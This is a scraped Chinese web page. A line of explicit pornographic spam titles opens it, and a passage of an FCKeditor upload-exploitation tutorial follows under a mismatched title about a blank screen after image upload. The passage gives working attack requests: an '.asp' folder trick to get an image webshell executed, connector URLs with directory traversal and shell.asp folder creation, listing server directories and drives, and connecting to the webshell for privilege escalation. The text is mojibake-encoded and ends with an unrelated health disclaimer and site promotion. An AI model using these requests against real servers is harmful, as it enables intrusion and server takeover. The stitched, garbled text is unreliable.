亚洲精品久久久久久第一页-人妻少妇精彩视品一区二区三区-91国产自拍免费视频-免费一级a在线播放视频正片-少妇天天日天天射天天爽-国产大屁股喷水视频在线观看-操美女骚穴抽插性爱视频-亚洲 欧美 中文字幕 丝袜-成人免费无码片在线观看

fckeditor上傳圖片后出現(xiàn)白屏的原因 fckeditor上傳圖片后出現(xiàn)白屏( 二 )


3.4 文件解析限制
通過(guò)Fckeditor編輯器在文件上傳頁(yè)面中,創(chuàng)建諸如1.asp文件夾,然后再到該文件夾下上傳一個(gè)圖片的
webshell文件,獲取其shell 。
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
4.列目錄
4.1 FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html不可以上傳文件,可以點(diǎn)擊上傳圖片按鈕再選擇瀏覽服務(wù)器即可跳
轉(zhuǎn)至可上傳文件頁(yè),可以查看已經(jīng)上傳的文件 。
4.2 根據(jù)xml返回信息查看網(wǎng)站目錄
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.as
px?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 獲取當(dāng)前文件夾
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 瀏覽E盤(pán)文件
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5. 連接木馬
在木馬能夠解析之后,使用各類(lèi)工具連接到木馬,獲取webshell 。至此,利用FCKeditor進(jìn)行文件上傳
并攻擊的過(guò)程就已經(jīng)完成
三. 其他
在獲取到webshell之后,可以進(jìn)行的操作非常多,也便于提權(quán)操作,拿下主機(jī)權(quán)限并不困難 。
關(guān)于該漏洞的防御,可以刪除掉所有的上傳點(diǎn),并限制目錄訪問(wèn) 。


以上關(guān)于本文的內(nèi)容,僅作參考!溫馨提示:如遇健康、疾病相關(guān)的問(wèn)題,請(qǐng)您及時(shí)就醫(yī)或請(qǐng)專(zhuān)業(yè)人士給予相關(guān)指導(dǎo)!

「愛(ài)刨根生活網(wǎng)」www.malaban59.cn小編還為您精選了以下內(nèi)容,希望對(duì)您有所幫助: